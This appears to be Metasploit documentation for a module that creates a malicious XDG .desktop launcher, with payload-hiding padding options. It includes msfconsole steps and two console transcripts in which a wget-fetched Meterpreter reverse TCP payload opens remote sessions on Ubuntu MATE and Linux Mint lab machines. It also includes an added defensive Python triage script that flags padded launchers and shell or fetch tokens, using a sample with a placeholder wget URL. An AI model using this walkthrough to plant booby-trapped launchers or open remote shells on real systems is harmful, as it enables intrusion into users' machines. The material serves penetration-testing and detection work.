Vulnerable Application
This module creates a malicious XDG Desktop (.desktop) file.
On most modern systems, desktop files are not trusted by default. The user will receive a warning prompt that the file is not trusted when running the file, but may choose to run the file anyway.
The default file manager applications in some desktop environments may impose stricter execution requirements, prompting the user to set the file as executable and/or mark the file as trusted before the file can be executed.
Options
FILENAME
The desktop file name. (Default: msf.desktop)
APPLICATION_NAME
The application name. Some file managers will display this name instead of the file name. (Default: random)
Advanced Options
PrependNewLines
Prepend new lines before the payload. (Default: 100)
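A triage check a defender could run over .desktop files they receive, given as an added example that is not part of the module or its documentation. It flags the two traits the options above describe: a long run of blank lines ahead of the Exec key and an Exec value that calls a shell or fetch tool. The function name, threshold and token list are hypothetical, and the check assumes the padding appears as blank lines before the Exec key.

```python
import re

# Constructed heuristics (assumptions, tune for your environment).
MAX_BLANK_LINES = 20  # the module's PrependNewLines default is 100
RISKY_TOKENS = {"sh", "bash", "dash", "wget", "curl", "python3", "perl", "base64"}

def triage_desktop_entry(text):
    """Parse .desktop file contents and return name, exec and findings."""
    entry, group, blanks, seen_exec = {}, None, 0, False
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped:
            # Count only blank lines that appear before the Exec key.
            blanks += 0 if seen_exec else 1
            continue
        if stripped.startswith("#"):
            continue
        if stripped.startswith("[") and stripped.endswith("]"):
            group = stripped[1:-1]
            continue
        if group == "Desktop Entry" and "=" in stripped:
            key, value = (part.strip() for part in stripped.split("=", 1))
            entry.setdefault(key, value)
            seen_exec = seen_exec or key == "Exec"
    findings = []
    if blanks > MAX_BLANK_LINES:
        findings.append(f"padding: {blanks} blank lines")
    # Split Exec into bare words so "/bin/sh" yields "sh".
    words = set(re.findall(r"[A-Za-z0-9_]+", entry.get("Exec", "")))
    risky = sorted(words & RISKY_TOKENS)
    if risky:
        findings.append("exec: runs " + ", ".join(risky))
    return {"name": entry.get("Name"), "exec": entry.get("Exec"), "findings": findings}

# Constructed samples: a padded launcher with a placeholder URL, and a benign one.
PADDED = "\n" * 100 + (
    "[Desktop Entry]\nType=Application\nName=Quarterly Report\n"
    'Exec=/bin/sh -c "wget http://example.invalid/placeholder"\n'
)
BENIGN = "[Desktop Entry]\nType=Application\nName=Text Editor\nExec=gedit %U\n"

if __name__ == "__main__":
    for label, sample in (("padded", PADDED), ("benign", BENIGN)):
        print(label, triage_desktop_entry(sample))
```

The returned name is the value a file manager may show in place of the file name, so it is worth including in any alert next to the real path.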
Verification Steps
On the Metasploit host:
Start msfconsole
Do: use exploit/multi/fileformat/xdg_desktop
Do: set filename [filename.desktop]
Do: set payload [payload]
Do: set lhost [lhost]
Do: set lport [lport]
Do: run
Do: handler -p [payload] -P [lport] -H [lhost]
On the target machine:
Open the msf.desktop file
If prompted, choose "Launch Anyway"
Scenarios
Ubuntu MATE 24.04.2 (x86_64)
msf > use exploit/multi/fileformat/xdg_desktop
[*] No payload configured, defaulting to cmd/linux/http/aarch64/meterpreter/reverse_tcp
msf exploit(multi/fileformat/xdg_desktop) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(multi/fileformat/xdg_desktop) > set lhost 192.168.200.130
lhost => 192.168.200.130
msf exploit(multi/fileformat/xdg_desktop) > set lport 4444
lport => 4444
msf exploit(multi/fileformat/xdg_desktop) > set FETCH_COMMAND wget
FETCH_COMMAND => WGET
msf exploit(multi/fileformat/xdg_desktop) > run
[+] msf.desktop stored at /root/.msf4/local/msf.desktop
msf exploit(multi/fileformat/xdg_desktop) > handler -p cmd/linux/http/x64/meterpreter/reverse_tcp -P 4444 -H 192.168.200.130
[*] Payload handler running as background job 0.
[*] Started reverse TCP handler on 192.168.200.130:4444
msf exploit(multi/fileformat/xdg_desktop) >
[*] Sending stage (3090404 bytes) to 192.168.200.193
[*] Meterpreter session 1 opened (192.168.200.130:4444 -> 192.168.200.193:52462) at 2025-07-29 03:29:10 -0400
msf exploit(multi/fileformat/xdg_desktop) > sessions -i -1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : linuxmint-mate-24-04.2-desktop-amd64
OS : Ubuntu 24.04 (Linux 6.14.0-24-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
Linux Mint 22.1 (MATE) (x86_64)
msf > use exploit/multi/fileformat/xdg_desktop
[*] No payload configured, defaulting to cmd/linux/http/aarch64/meterpreter/reverse_tcp
msf exploit(multi/fileformat/xdg_desktop) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(multi/fileformat/xdg_desktop) > set lhost 192.168.200.130
lhost => 192.168.200.130
msf exploit(multi/fileformat/xdg_desktop) > set lport 4444
lport => 4444
msf exploit(multi/fileformat/xdg_desktop) > set FETCH_COMMAND wget
FETCH_COMMAND => WGET
msf exploit(multi/fileformat/xdg_desktop) > run
[+] msf.desktop stored at /root/.msf4/local/msf.desktop
msf exploit(multi/fileformat/xdg_desktop) > handler -p cmd/linux/http/x64/meterpreter/reverse_tcp -P 4444 -H 192.168.200.130
[*] Payload handler running as background job 0.
[*] Started reverse TCP handler on 192.168.200.130:4444
msf exploit(multi/fileformat/xdg_desktop) >
[*] Sending stage (3090404 bytes) to 192.168.200.189
[*] Meterpreter session 1 opened (192.168.200.130:4444 -> 192.168.200.189:35162) at 2025-07-29 02:45:34 -0400
msf exploit(multi/fileformat/xdg_desktop) > sessions -i -1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : 192.168.200.189
OS : LinuxMint 22.1 (Linux 6.8.0-51-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >